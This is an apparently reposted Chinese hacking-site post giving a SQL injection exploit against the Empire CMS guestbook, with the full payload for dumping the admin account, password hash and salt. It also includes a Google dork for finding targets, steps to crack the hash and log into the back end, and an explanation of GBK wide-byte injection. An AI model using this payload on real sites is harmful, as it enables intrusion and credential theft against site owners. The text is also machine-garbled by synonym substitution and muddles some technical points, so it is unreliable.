深灰丢出来的0day. 
      找到行使帝国CMS的站,网址后头直接加:e/tool/gbook/?bid=1
      譬喻：?bid=1
      出来的是帝国CMS的留言本,在姓名处写:縗\ 
      接洽邮箱处写: 
,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/* 
      提交后爆出账号暗码 
      测试要领：操作google搜刮要害字 inurl:e/tool/gbook/?bid=1，然后依照上面方法留言，表现功效即爆出打点员帐号和暗码md5值，破解暗码登岸靠山。 
      只发布了oday的操作要领，并没有声名个中的一些道理，本日壮壮胆，跟各人说明一下 
      1.这个裂痕就是php注入，上面的注入语句各人也看到了 
,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/* 
      查询phome_enewsuser表段中username,password,rnd三个字段信息，查询的前提是userid=1，排在第一位的，预计也是打点员，虽然假如网站存在多个打点员，可以把1换成其他数字 
      2.姓名处写：縗\ 
      为什么要写：縗\？这里涉及到一个双字节裂痕 
      要知道这个必要相识几个常识点 
      1)假如安装过php情形的伴侣应该知道，在php.ini中有一个get_magic_quotes_gpc成果 
      当这个成果打开时，全部的 ' (单引号), " (双引号), \ (反斜线) and 空字符会自动加上转义符\ 
      当这个成果开启时，字符串可以直接入库 
      2)注入各人知道，要用到“and” ，and被php转义为%df，因为 get_magic_quotes_gpc开启，以是自动插手了“\” ，“\"转换为十六进制后为%5C 。
      因为看出，着实我们输入“and”被php转义成为%df%5c 
      可是当这些字符进入mysql数据库举办GBK编码时，就会被以为这是一个宽字符,也就是"縗" 
      总结一下： 
      %df'?==>? %df\'??==> ?%df%5c'??==> ?縗' 
      这就是php中常见的宽字节裂痕，也称双字节裂痕 
      如我们在平常的检测进程中更换原本的 and 1=1 
      %df%27 or 1=1/* 
      %df%27 or 1=2/*

【声明】:黑吧安详网()刊登此文出于转达更多信息之目标，并不代表本站拥护其概念和对其真实性认真，仅适于收集安详技能喜爱者进修研究行使，进修中请遵循国度相干法令礼貌。若有题目请接洽我们，接洽邮箱admin@myhack58.com，我们会在最短的时刻内举办处理赏罚。